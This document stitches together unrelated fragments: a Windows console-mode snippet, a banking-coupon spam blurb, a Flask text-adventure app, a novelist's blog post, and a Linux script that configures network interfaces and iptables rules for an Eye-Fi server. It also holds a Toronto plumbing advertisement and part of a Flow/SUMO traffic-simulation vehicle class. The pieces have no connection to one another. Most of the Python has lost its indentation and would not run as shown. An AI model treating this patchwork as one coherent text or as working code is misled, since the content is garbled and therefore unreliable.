windll.kernel32.SetConsoleMode(
self.handle, self.original_mode.value |
(ENABLE_ECHO_INPUT | ENABLE_LINE_INPUT | ENABLE_PROCESSED_INPUT))
|
Banking coupons: Get a high-quality personal banking experience with well-known online marketplaces such as Bin DB, Western Union, UK Forex, By Travel Money Online and many more. Internet banking gives you real-time access to your account and lets you transfer money anywhere within seconds. Personal banking services include free checking accounts, savings accounts, credit cards, health savings accounts, and many more online services from various marketplaces. Use banking promotions and coupon codes to save money on banking services.
|
# FLASK WEBSITE
# Runs the game online (currently only on localhost:5000).
# Renders HTML, passes user_action to game.play(action), and calls database
# methods to get, save, and delete games.
from game import Game
from db_methods import SECRET_KEY, DATABASE, COLLECTION, DEBUG, app, g, \
connect_db, init_db, save_game, get_game, new_game
from flask import Flask, render_template, request, session, redirect, url_for
@app.before_request
def before_request():
g.connection = connect_db()
g.db = g.connection[DATABASE][COLLECTION]
@app.teardown_request
def teardown_request(exception):
g.connection.close()
def get_new_game(user_id=None):
blank_game = Game()
if user_id:
        print("deleting user", user_id)
    session['id'] = new_game(blank_game, user_id)
    print("creating a new game for user", session['id'])
return redirect(url_for('index'))
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'GET':
if 'id' in session and get_game(session['id']):
loaded_game = get_game(session['id'])
            print("session", session['id'], "is already initialized")
return render_template('form.html', room=loaded_game.game['location'],
inventory=loaded_game.game['inv'], exits=loaded_game.game['location'].exits)
else:
if 'id' in session:
return get_new_game(session['id'])
return get_new_game()
elif request.method == 'POST':
action = request.form['action']
if 'id' not in session:
return redirect(url_for('index'))
loaded = get_game(session['id'])
msg = loaded.play(action)
save_game(session['id'], loaded)
        print("saving game for user", session['id'])
return render_template('form.html', room=loaded.game['location'], inventory=loaded.game['inv'], \
exits=loaded.game['location'].exits, message=msg)
@app.route('/newgame', methods=['GET'])
def newgame():
    return get_new_game(session.get('id'))
if __name__ == '__main__':
app.run(host='localhost')
|
There must be a good many people who’ve thought that over the past year—David Cameron and Theresa May among them.
But it’s not just out in the wide world that life can scatter all your preconceptions like a ball plunging into a set of skittles.
I promised myself I’d do a bit of work on that other project (a contemporary novel) and return to my historical novel in the autumn, after it had been rested for about five months or so. All very sensible and organised.
Well, that was more than a year ago. Life (and, sadly, death) intervened and I’ve only just lately been able to return to that ‘resting’ novel.
At least it’s meant that it was almost like reading something completely new. I came to it with fresh eyes, able to see what was good about it and what needed rewriting. Of course, I’d hoped there’d be very little to change, that it would all seem wonderful.
It didn’t. In fact, it was very clear that the book needed a complete re-write. It wasn’t a disaster, but it definitely wasn’t working as it should. The bones of it were there, but that was all. It was a skeleton without flesh and life. The good thing was that I could see quite clearly not only what was wrong with it, but how to start putting it right.
So that’s the task now, to put flesh on the bones and breathe life into them. I don’t regret the long break—it’s been an ideal way to approach the final stretch of this novel. And at long last I have time to write. In theory anyway.
I know that my plans for a summer of writing could well be interrupted, by small distractions or major upheavals, good or bad, domestic, national or international. You never know what’s round the corner.
This entry was posted in Authorial voice, Random Thoughts, Self-publishing and tagged break in writing, editing, first draft, Historical fiction, historical novels, how long to write?, new novel, self-publishing, work in progress, writing life. Bookmark the permalink.
Hope your writing takes you to some great places this summer.
|
# coding=utf-8
#----------------------------------------------------------------------
# Copyright (c) 2013 Horacio G. de Oro <hgdeoro@gmail.com>
#----------------------------------------------------------------------
# This file is part of EFLU.
#
# EFLU is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# EFLU is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EFLU. If not, see <http://www.gnu.org/licenses/>.
#----------------------------------------------------------------------
import logging
import subprocess
from eyefilinuxui.util import kdesudo
logger = logging.getLogger(__name__)
def nm_interface_exists(interface):
"""Returns True if interface exists"""
# $ nmcli -t -f DEVICE dev
# wlan0
# eth0
output = subprocess.check_output(["nmcli", "-t", "-f", "DEVICE", "dev"])
logger.debug("OUTPUT: %s", output)
return interface in [l.strip() for l in output.strip().splitlines() if l.strip()]
def nm_check_disconnected(interface):
"""Returns True if interface is disconnected"""
# $ nmcli -t -f DEVICE,STATE dev
# wlan0:disconnected
# eth0:connected
output = subprocess.check_output(["nmcli", "-t", "-f", "DEVICE,STATE", "dev"])
for line in [l.strip() for l in output.strip().splitlines() if l.strip()]:
dev, state = line.split(':')
if dev == interface:
if state == 'disconnected':
logger.info("GOOD! Device %s is disconnected.", interface)
return True
        else:
            logger.warning("Device %s isn't disconnected - Device state: %s", interface, state)
            return False
    logger.warning("nmcli didn't return info for interface %s", interface)
    return False
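The `DEVICE:STATE` parsing done inline above can be factored into a pure function, which is easy to test without nmcli installed (the sample output string below is hypothetical):

```python
def parse_device_states(output):
    # Turn the terse output of `nmcli -t -f DEVICE,STATE dev`
    # (one "device:state" pair per line) into a dict.
    states = {}
    for line in output.strip().splitlines():
        line = line.strip()
        if line:
            dev, state = line.split(':', 1)
            states[dev] = state
    return states

sample = "wlan0:disconnected\neth0:connected\n"
```

Splitting on the first `:` only (`split(':', 1)`) keeps the parse safe even if a state string ever contained a colon.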
def nm_try_disconnect(interface):
return subprocess.call(["nmcli", "dev", "disconnect", "iface", interface])
def ifconfig(interface, ip):
return kdesudo(["ifconfig", interface, "{0}/24".format(ip)])
def iptables(interface, ip):
    # FIXME: add comments, and avoid re-applying the firewall setup every time the app starts
iptables_rules = subprocess.check_output(["kdesudo", "--", "iptables", "-n", "-v", "-L", "INPUT"])
logger.debug("iptables_rules: %s", iptables_rules)
if iptables_rules.find("/* EyeFiServerUi/1 */") == -1:
kdesudo(["iptables", "-I", "INPUT", "-i", interface,
"-p", "icmp", "-d", ip, "-m", "comment", "--comment", "EyeFiServerUi/1", "-j", "ACCEPT"])
if iptables_rules.find("/* EyeFiServerUi/2 */") == -1:
kdesudo(["iptables", "-I", "INPUT", "-i", interface,
"-p", "tcp", "-d", ip, "-m", "comment", "--comment", "EyeFiServerUi/2",
"--dport", "59278", "-j", "ACCEPT"])
if iptables_rules.find("/* EyeFiServerUi/3 */") == -1:
kdesudo(["iptables", "-I", "INPUT", "-i", interface,
"-p", "udp", "-d", ip, "-m", "comment", "--comment", "EyeFiServerUi/3",
"--dport", "67:68", "-j", "ACCEPT"])
|
Last updated: February 11, 2019. When you need 24-hour Swansea plumbers, we are an experienced group of local plumbing pros who are ready to help. There are houses in the Swansea part of Toronto that date back to the 1800s. With a neighborhood that old, there are bound to be maintenance issues. Our Swansea plumbers service this part of Toronto and other local neighborhoods. You know you are in safe hands when you call a company that has been in the industry for over 25 years.
You can be confident that after you call to hire our local Swansea plumber, we will arrive within 24 hours. We will assess the problem, recommend the most cost-effective long-term plumbing solution, and show you the cost up front before starting the work, so you can be as comfortable as possible with the service. It's that simple. We have no hidden charges and do not charge for overtime. We work all year long, with no days off, so you can always count on us whenever your plumbing lets you down. Please feel free to reach out to us 24 hours a day.
When you call our Swansea plumbers, you can expect nothing but world-class local professionals on call, ready to arrive and fix your plumbing problem quickly and efficiently. We arrive at your doorstep fully prepared to handle any issue, big or small, with all of the tools and materials we need to get the problem fixed in no time at all.
Our plumbing solutions are built to last. Using advanced plumbing technology, we can rely on minimally invasive and non-invasive procedures that will keep your house warm, secure, and dry well into the future. We're enthusiastic about what we do and enjoy presenting a clean and organized appearance in company uniforms. You will only ever get a flat-rate quote from our Swansea plumbers, and we will provide this pricing before beginning the job. There are never any hourly charges or overtime fees, and no additional fees if you need us on a weekend, in the evening or at night, or even on a major holiday.
Moreover, our Swansea plumbing services are provided by local plumbers known for their considerate demeanor and helpful communication. That's because we take a great deal of time selecting the best and most experienced plumbers: wonderful people with a proven willingness to make sure you're comfortable with the flat-rate cost upfront as well as with the outcome at the end of the project. To benefit everyone involved, we make it our duty to clean up the area and ask for your written review at the close of the job. It is our pleasure and privilege to provide our Swansea plumbing services to you 24 hours a day. Give us a call and get your plumbing problems resolved fast, at a reasonable, flat-rate, upfront price today!
|
"""Script containing the TraCI vehicle kernel class."""
import traceback
from flow.core.kernel.vehicle import KernelVehicle
import traci.constants as tc
from traci.exceptions import FatalTraCIError, TraCIException
import numpy as np
import collections
import warnings
from flow.controllers.car_following_models import SimCarFollowingController
from flow.controllers.rlcontroller import RLController
from flow.controllers.lane_change_controllers import SimLaneChangeController
from bisect import bisect_left
import itertools
from copy import deepcopy
# colors for vehicles
WHITE = (255, 255, 255)
CYAN = (0, 255, 255)
RED = (255, 0, 0)
class TraCIVehicle(KernelVehicle):
"""Flow kernel for the TraCI API.
Extends flow.core.kernel.vehicle.base.KernelVehicle
"""
def __init__(self,
master_kernel,
sim_params):
"""See parent class."""
KernelVehicle.__init__(self, master_kernel, sim_params)
self.__ids = [] # ids of all vehicles
self.__human_ids = [] # ids of human-driven vehicles
self.__controlled_ids = [] # ids of flow-controlled vehicles
self.__controlled_lc_ids = [] # ids of flow lc-controlled vehicles
self.__rl_ids = [] # ids of rl-controlled vehicles
self.__observed_ids = [] # ids of the observed vehicles
# vehicles: Key = Vehicle ID, Value = Dictionary describing the vehicle
# Ordered dictionary used to keep neural net inputs in order
self.__vehicles = collections.OrderedDict()
# create a sumo_observations variable that will carry all information
# on the state of the vehicles for a given time step
self.__sumo_obs = {}
# total number of vehicles in the network
self.num_vehicles = 0
# number of rl vehicles in the network
self.num_rl_vehicles = 0
# contains the parameters associated with each type of vehicle
self.type_parameters = {}
# contain the minGap attribute of each type of vehicle
self.minGap = {}
# list of vehicle ids located in each edge in the network
self._ids_by_edge = dict()
# number of vehicles that entered the network for every time-step
self._num_departed = []
self._departed_ids = []
# number of vehicles to exit the network for every time-step
self._num_arrived = []
self._arrived_ids = []
# whether or not to automatically color vehicles
try:
self._color_vehicles = sim_params.color_vehicles
except AttributeError:
self._color_vehicles = False
def initialize(self, vehicles):
"""Initialize vehicle state information.
This is responsible for collecting vehicle type information from the
VehicleParams object and placing them within the Vehicles kernel.
Parameters
----------
vehicles : flow.core.params.VehicleParams
initial vehicle parameter information, including the types of
individual vehicles and their initial speeds
"""
self.type_parameters = vehicles.type_parameters
self.minGap = vehicles.minGap
self.num_vehicles = 0
self.num_rl_vehicles = 0
self.__vehicles.clear()
for typ in vehicles.initial:
for i in range(typ['num_vehicles']):
veh_id = '{}_{}'.format(typ['veh_id'], i)
self.__vehicles[veh_id] = dict()
self.__vehicles[veh_id]['type'] = typ['veh_id']
self.__vehicles[veh_id]['initial_speed'] = typ['initial_speed']
self.num_vehicles += 1
if typ['acceleration_controller'][0] == RLController:
self.num_rl_vehicles += 1
def update(self, reset):
"""See parent class.
The following actions are performed:
* The state of all vehicles is modified to match their state at the
current time step. This includes states specified by sumo, and states
explicitly defined by flow, e.g. "num_arrived".
* If vehicles exit the network, they are removed from the vehicles
class, and newly departed vehicles are introduced to the class.
Parameters
----------
reset : bool
specifies whether the simulator was reset in the last simulation
step
"""
vehicle_obs = {}
for veh_id in self.__ids:
vehicle_obs[veh_id] = \
self.kernel_api.vehicle.getSubscriptionResults(veh_id)
sim_obs = self.kernel_api.simulation.getSubscriptionResults()
# remove exiting vehicles from the vehicles class
for veh_id in sim_obs[tc.VAR_ARRIVED_VEHICLES_IDS]:
if veh_id not in sim_obs[tc.VAR_TELEPORT_STARTING_VEHICLES_IDS]:
self.remove(veh_id)
# remove exiting vehicles from the vehicle subscription if they
# haven't been removed already
if vehicle_obs[veh_id] is None:
vehicle_obs.pop(veh_id, None)
else:
# this is meant to resolve the KeyError bug when there are
# collisions
vehicle_obs[veh_id] = self.__sumo_obs[veh_id]
# add entering vehicles into the vehicles class
for veh_id in sim_obs[tc.VAR_DEPARTED_VEHICLES_IDS]:
veh_type = self.kernel_api.vehicle.getTypeID(veh_id)
if veh_id in self.get_ids():
# this occurs when a vehicle is actively being removed and
# placed again in the network to ensure a constant number of
# total vehicles (e.g. GreenWaveEnv). In this case, the vehicle
# is already in the class; its state data just needs to be
# updated
pass
else:
obs = self._add_departed(veh_id, veh_type)
# add the subscription information of the new vehicle
vehicle_obs[veh_id] = obs
if reset:
self.time_counter = 0
# reset all necessary values
self.prev_last_lc = dict()
for veh_id in self.__rl_ids:
self.__vehicles[veh_id]["last_lc"] = -float("inf")
self.prev_last_lc[veh_id] = -float("inf")
self._num_departed.clear()
self._num_arrived.clear()
self._departed_ids.clear()
self._arrived_ids.clear()
# add vehicles from a network template, if applicable
if hasattr(self.master_kernel.scenario.network,
"template_vehicles"):
for veh_id in self.master_kernel.scenario.network.\
template_vehicles:
vals = deepcopy(self.master_kernel.scenario.network.
template_vehicles[veh_id])
# a step is executed during initialization, so add this sim
# step to the departure time of vehicles
vals['depart'] = str(
float(vals['depart']) + 2 * self.sim_step)
self.kernel_api.vehicle.addFull(
veh_id, 'route{}_0'.format(veh_id), **vals)
else:
self.time_counter += 1
# update the "last_lc" variable
for veh_id in self.__rl_ids:
prev_lane = self.get_lane(veh_id)
if vehicle_obs[veh_id][tc.VAR_LANE_INDEX] != prev_lane:
self.__vehicles[veh_id]["last_lc"] = self.time_counter
            # update the lists of departed and arrived vehicles
            self._num_departed.append(
                len(sim_obs[tc.VAR_DEPARTED_VEHICLES_IDS]))
            self._num_arrived.append(len(sim_obs[tc.VAR_ARRIVED_VEHICLES_IDS]))
            self._departed_ids.append(sim_obs[tc.VAR_DEPARTED_VEHICLES_IDS])
            self._arrived_ids.append(sim_obs[tc.VAR_ARRIVED_VEHICLES_IDS])
# update the "headway", "leader", and "follower" variables
for veh_id in self.__ids:
try:
_position = vehicle_obs.get(veh_id, {}).get(
tc.VAR_POSITION, -1001)
_angle = vehicle_obs.get(veh_id, {}).get(tc.VAR_ANGLE, -1001)
_time_step = sim_obs[tc.VAR_TIME_STEP]
_time_delta = sim_obs[tc.VAR_DELTA_T]
self.__vehicles[veh_id]["orientation"] = \
list(_position) + [_angle]
self.__vehicles[veh_id]["timestep"] = _time_step
self.__vehicles[veh_id]["timedelta"] = _time_delta
except TypeError:
print(traceback.format_exc())
headway = vehicle_obs.get(veh_id, {}).get(tc.VAR_LEADER, None)
# check for a collided vehicle or a vehicle with no leader
if headway is None:
self.__vehicles[veh_id]["leader"] = None
self.__vehicles[veh_id]["follower"] = None
self.__vehicles[veh_id]["headway"] = 1e+3
else:
min_gap = self.minGap[self.get_type(veh_id)]
self.__vehicles[veh_id]["headway"] = headway[1] + min_gap
self.__vehicles[veh_id]["leader"] = headway[0]
try:
self.__vehicles[headway[0]]["follower"] = veh_id
except KeyError:
print(traceback.format_exc())
# update the sumo observations variable
self.__sumo_obs = vehicle_obs.copy()
# update the lane leaders data for each vehicle
self._multi_lane_headways()
# make sure the rl vehicle list is still sorted
self.__rl_ids.sort()
def _add_departed(self, veh_id, veh_type):
"""Add a vehicle that entered the network from an inflow or reset.
Parameters
----------
veh_id: str
name of the vehicle
veh_type: str
type of vehicle, as specified to sumo
Returns
-------
dict
subscription results from the new vehicle
"""
if veh_type not in self.type_parameters:
raise KeyError("Entering vehicle is not a valid type.")
self.__ids.append(veh_id)
if veh_id not in self.__vehicles:
self.num_vehicles += 1
self.__vehicles[veh_id] = dict()
# specify the type
self.__vehicles[veh_id]["type"] = veh_type
car_following_params = \
self.type_parameters[veh_type]["car_following_params"]
# specify the acceleration controller class
accel_controller = \
self.type_parameters[veh_type]["acceleration_controller"]
self.__vehicles[veh_id]["acc_controller"] = \
accel_controller[0](veh_id,
car_following_params=car_following_params,
**accel_controller[1])
# specify the lane-changing controller class
lc_controller = \
self.type_parameters[veh_type]["lane_change_controller"]
self.__vehicles[veh_id]["lane_changer"] = \
lc_controller[0](veh_id=veh_id, **lc_controller[1])
# specify the routing controller class
rt_controller = self.type_parameters[veh_type]["routing_controller"]
if rt_controller is not None:
self.__vehicles[veh_id]["router"] = \
rt_controller[0](veh_id=veh_id, router_params=rt_controller[1])
else:
self.__vehicles[veh_id]["router"] = None
# add the vehicle's id to the list of vehicle ids
if accel_controller[0] == RLController:
self.__rl_ids.append(veh_id)
self.num_rl_vehicles += 1
else:
self.__human_ids.append(veh_id)
if accel_controller[0] != SimCarFollowingController:
self.__controlled_ids.append(veh_id)
if lc_controller[0] != SimLaneChangeController:
self.__controlled_lc_ids.append(veh_id)
# subscribe the new vehicle
self.kernel_api.vehicle.subscribe(veh_id, [
tc.VAR_LANE_INDEX, tc.VAR_LANEPOSITION, tc.VAR_ROAD_ID,
tc.VAR_SPEED, tc.VAR_EDGES, tc.VAR_POSITION, tc.VAR_ANGLE,
tc.VAR_SPEED_WITHOUT_TRACI
])
self.kernel_api.vehicle.subscribeLeader(veh_id, 2000)
# some constant vehicle parameters to the vehicles class
self.__vehicles[veh_id]["length"] = self.kernel_api.vehicle.getLength(
veh_id)
# set the "last_lc" parameter of the vehicle
self.__vehicles[veh_id]["last_lc"] = -float("inf")
# specify the initial speed
self.__vehicles[veh_id]["initial_speed"] = \
self.type_parameters[veh_type]["initial_speed"]
# set the speed mode for the vehicle
speed_mode = self.type_parameters[veh_type][
"car_following_params"].speed_mode
self.kernel_api.vehicle.setSpeedMode(veh_id, speed_mode)
# set the lane changing mode for the vehicle
lc_mode = self.type_parameters[veh_type][
"lane_change_params"].lane_change_mode
self.kernel_api.vehicle.setLaneChangeMode(veh_id, lc_mode)
# get initial state info
self.__sumo_obs[veh_id] = dict()
self.__sumo_obs[veh_id][tc.VAR_ROAD_ID] = \
self.kernel_api.vehicle.getRoadID(veh_id)
self.__sumo_obs[veh_id][tc.VAR_LANEPOSITION] = \
self.kernel_api.vehicle.getLanePosition(veh_id)
self.__sumo_obs[veh_id][tc.VAR_LANE_INDEX] = \
self.kernel_api.vehicle.getLaneIndex(veh_id)
self.__sumo_obs[veh_id][tc.VAR_SPEED] = \
self.kernel_api.vehicle.getSpeed(veh_id)
# make sure that the order of rl_ids is kept sorted
self.__rl_ids.sort()
# get the subscription results from the new vehicle
new_obs = self.kernel_api.vehicle.getSubscriptionResults(veh_id)
return new_obs
def remove(self, veh_id):
"""See parent class."""
# remove from sumo
if veh_id in self.kernel_api.vehicle.getIDList():
self.kernel_api.vehicle.unsubscribe(veh_id)
self.kernel_api.vehicle.remove(veh_id)
try:
# remove from the vehicles kernel
del self.__vehicles[veh_id]
del self.__sumo_obs[veh_id]
self.__ids.remove(veh_id)
# remove it from all other ids (if it is there)
if veh_id in self.__human_ids:
self.__human_ids.remove(veh_id)
if veh_id in self.__controlled_ids:
self.__controlled_ids.remove(veh_id)
if veh_id in self.__controlled_lc_ids:
self.__controlled_lc_ids.remove(veh_id)
else:
self.__rl_ids.remove(veh_id)
# make sure that the rl ids remain sorted
self.__rl_ids.sort()
except KeyError:
pass
# modify the number of vehicles and RL vehicles
self.num_vehicles = len(self.get_ids())
self.num_rl_vehicles = len(self.get_rl_ids())
def test_set_speed(self, veh_id, speed):
"""Set the speed of the specified vehicle."""
self.__sumo_obs[veh_id][tc.VAR_SPEED] = speed
def test_set_edge(self, veh_id, edge):
        """Set the edge of the specified vehicle."""
self.__sumo_obs[veh_id][tc.VAR_ROAD_ID] = edge
def set_follower(self, veh_id, follower):
"""Set the follower of the specified vehicle."""
self.__vehicles[veh_id]["follower"] = follower
def set_headway(self, veh_id, headway):
"""Set the headway of the specified vehicle."""
self.__vehicles[veh_id]["headway"] = headway
def get_orientation(self, veh_id):
"""See parent class."""
return self.__vehicles[veh_id]["orientation"]
def get_timestep(self, veh_id):
"""See parent class."""
return self.__vehicles[veh_id]["timestep"]
def get_timedelta(self, veh_id):
"""See parent class."""
return self.__vehicles[veh_id]["timedelta"]
def get_type(self, veh_id):
"""Return the type of the vehicle of veh_id."""
return self.__vehicles[veh_id]["type"]
def get_initial_speed(self, veh_id):
"""Return the initial speed of the vehicle of veh_id."""
return self.__vehicles[veh_id]["initial_speed"]
def get_ids(self):
"""See parent class."""
return self.__ids
def get_human_ids(self):
"""See parent class."""
return self.__human_ids
def get_controlled_ids(self):
"""See parent class."""
return self.__controlled_ids
def get_controlled_lc_ids(self):
"""See parent class."""
return self.__controlled_lc_ids
def get_rl_ids(self):
"""See parent class."""
return self.__rl_ids
def set_observed(self, veh_id):
"""See parent class."""
if veh_id not in self.__observed_ids:
self.__observed_ids.append(veh_id)
def remove_observed(self, veh_id):
"""See parent class."""
if veh_id in self.__observed_ids:
self.__observed_ids.remove(veh_id)
def get_observed_ids(self):
"""See parent class."""
return self.__observed_ids
def get_ids_by_edge(self, edges):
"""See parent class."""
if isinstance(edges, (list, np.ndarray)):
return sum([self.get_ids_by_edge(edge) for edge in edges], [])
return self._ids_by_edge.get(edges, []) or []
def get_inflow_rate(self, time_span):
"""See parent class."""
if len(self._num_departed) == 0:
return 0
num_inflow = self._num_departed[-int(time_span / self.sim_step):]
return 3600 * sum(num_inflow) / (len(num_inflow) * self.sim_step)
def get_outflow_rate(self, time_span):
"""See parent class."""
if len(self._num_arrived) == 0:
return 0
num_outflow = self._num_arrived[-int(time_span / self.sim_step):]
return 3600 * sum(num_outflow) / (len(num_outflow) * self.sim_step)
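The conversion in the two rate getters above works as follows: the last `time_span / sim_step` per-step counts are summed and scaled by `3600 / (window length * sim_step)` to yield vehicles per hour. A minimal standalone sketch (the `flow_rate` helper name is ours, not part of the class):

```python
def flow_rate(counts, time_span, sim_step):
    """Convert per-step departure/arrival counts into a veh/hr rate.

    Mirrors get_inflow_rate/get_outflow_rate: take the last
    time_span / sim_step entries and scale the average count per
    second up to an hourly rate.
    """
    if len(counts) == 0:
        return 0
    window = counts[-int(time_span / sim_step):]
    return 3600 * sum(window) / (len(window) * sim_step)

# one vehicle per 0.1 s step over a 1 s window -> 10 veh/s -> 36000 veh/hr
print(flow_rate([1] * 10, 1.0, 0.1))
```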
def get_num_arrived(self):
"""See parent class."""
if len(self._num_arrived) > 0:
return self._num_arrived[-1]
else:
return 0
    def get_arrived_ids(self):
        """See parent class."""
        if len(self._arrived_ids) > 0:
            return self._arrived_ids[-1]
        else:
            # return an empty list (not 0) so callers can always iterate
            return []
    def get_departed_ids(self):
        """See parent class."""
        if len(self._departed_ids) > 0:
            return self._departed_ids[-1]
        else:
            return []
def get_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_speed(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_SPEED, error)
def get_default_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_default_speed(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_SPEED_WITHOUT_TRACI,
error)
def get_position(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_position(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_LANEPOSITION, error)
def get_edge(self, veh_id, error=""):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_edge(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_ROAD_ID, error)
def get_lane(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_LANE_INDEX, error)
def get_route(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_route(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_EDGES, error)
def get_length(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_length(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("length", error)
def get_leader(self, veh_id, error=""):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_leader(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("leader", error)
def get_follower(self, veh_id, error=""):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_follower(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("follower", error)
def get_headway(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_headway(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("headway", error)
    def get_last_lc(self, veh_id, error=-1001):
        """See parent class."""
        if isinstance(veh_id, (list, np.ndarray)):
            return [self.get_last_lc(vehID, error) for vehID in veh_id]
        if veh_id not in self.__rl_ids:
            warnings.warn('Vehicle {} is not an RL vehicle, "last_lc" term '
                          'set to {}.'.format(veh_id, error))
            return error
        else:
            return self.__vehicles.get(veh_id, {}).get("last_lc", error)
def get_acc_controller(self, veh_id, error=None):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_acc_controller(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("acc_controller", error)
def get_lane_changing_controller(self, veh_id, error=None):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [
self.get_lane_changing_controller(vehID, error)
for vehID in veh_id
]
return self.__vehicles.get(veh_id, {}).get("lane_changer", error)
def get_routing_controller(self, veh_id, error=None):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [
self.get_routing_controller(vehID, error) for vehID in veh_id
]
return self.__vehicles.get(veh_id, {}).get("router", error)
def set_lane_headways(self, veh_id, lane_headways):
"""Set the lane headways of the specified vehicle."""
self.__vehicles[veh_id]["lane_headways"] = lane_headways
def get_lane_headways(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_headways(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("lane_headways", error)
def get_lane_leaders_speed(self, veh_id, error=list()):
"""See parent class."""
lane_leaders = self.get_lane_leaders(veh_id)
return [0 if lane_leader == '' else self.get_speed(lane_leader)
for lane_leader in lane_leaders]
def get_lane_followers_speed(self, veh_id, error=list()):
"""See parent class."""
lane_followers = self.get_lane_followers(veh_id)
return [0 if lane_follower == '' else self.get_speed(lane_follower)
for lane_follower in lane_followers]
def set_lane_leaders(self, veh_id, lane_leaders):
"""Set the lane leaders of the specified vehicle."""
self.__vehicles[veh_id]["lane_leaders"] = lane_leaders
def get_lane_leaders(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_leaders(vehID, error) for vehID in veh_id]
return self.__vehicles[veh_id]["lane_leaders"]
def set_lane_tailways(self, veh_id, lane_tailways):
"""Set the lane tailways of the specified vehicle."""
self.__vehicles[veh_id]["lane_tailways"] = lane_tailways
def get_lane_tailways(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_tailways(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("lane_tailways", error)
def set_lane_followers(self, veh_id, lane_followers):
"""Set the lane followers of the specified vehicle."""
self.__vehicles[veh_id]["lane_followers"] = lane_followers
def get_lane_followers(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_followers(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("lane_followers", error)
def _multi_lane_headways(self):
"""Compute multi-lane data for all vehicles.
This includes the lane leaders/followers/headways/tailways/
leader velocity/follower velocity for all
vehicles in the network.
"""
edge_list = self.master_kernel.scenario.get_edge_list()
junction_list = self.master_kernel.scenario.get_junction_list()
tot_list = edge_list + junction_list
num_edges = (len(self.master_kernel.scenario.get_edge_list()) + len(
self.master_kernel.scenario.get_junction_list()))
# maximum number of lanes in the network
max_lanes = max([self.master_kernel.scenario.num_lanes(edge_id)
for edge_id in tot_list])
# Key = edge id
# Element = list, with the ith element containing tuples with the name
# and position of all vehicles in lane i
edge_dict = dict.fromkeys(tot_list)
# add the vehicles to the edge_dict element
for veh_id in self.get_ids():
edge = self.get_edge(veh_id)
lane = self.get_lane(veh_id)
pos = self.get_position(veh_id)
if edge:
if edge_dict[edge] is None:
edge_dict[edge] = [[] for _ in range(max_lanes)]
edge_dict[edge][lane].append((veh_id, pos))
# sort all lanes in each edge by position
for edge in tot_list:
if edge_dict[edge] is None:
del edge_dict[edge]
else:
for lane in range(max_lanes):
edge_dict[edge][lane].sort(key=lambda x: x[1])
for veh_id in self.get_rl_ids():
# collect the lane leaders, followers, headways, and tailways for
# each vehicle
edge = self.get_edge(veh_id)
if edge:
headways, tailways, leaders, followers = \
self._multi_lane_headways_util(veh_id, edge_dict,
num_edges)
# add the above values to the vehicles class
self.set_lane_headways(veh_id, headways)
self.set_lane_tailways(veh_id, tailways)
self.set_lane_leaders(veh_id, leaders)
self.set_lane_followers(veh_id, followers)
self._ids_by_edge = dict().fromkeys(edge_list)
for edge_id in edge_dict:
edges = list(itertools.chain.from_iterable(edge_dict[edge_id]))
# check for edges with no vehicles
if len(edges) > 0:
edges, _ = zip(*edges)
self._ids_by_edge[edge_id] = list(edges)
else:
self._ids_by_edge[edge_id] = []
def _multi_lane_headways_util(self, veh_id, edge_dict, num_edges):
"""Compute multi-lane data for the specified vehicle.
        Parameters
        ----------
        veh_id : str
            name of the vehicle
        edge_dict : dict < list<tuple> >
            Key = Edge name
            Index = lane index
            Element = list sorted by position of (vehicle id, position)
        num_edges : int
            number of edges (and junctions) in the network
        Returns
        -------
        headway : list<float>
            Index = lane index
            Element = headway at this lane
        tailway : list<float>
            Index = lane index
            Element = tailway at this lane
        leader : list<str>
            Index = lane index
            Element = leader at this lane
        follower : list<str>
            Index = lane index
            Element = follower at this lane
        """
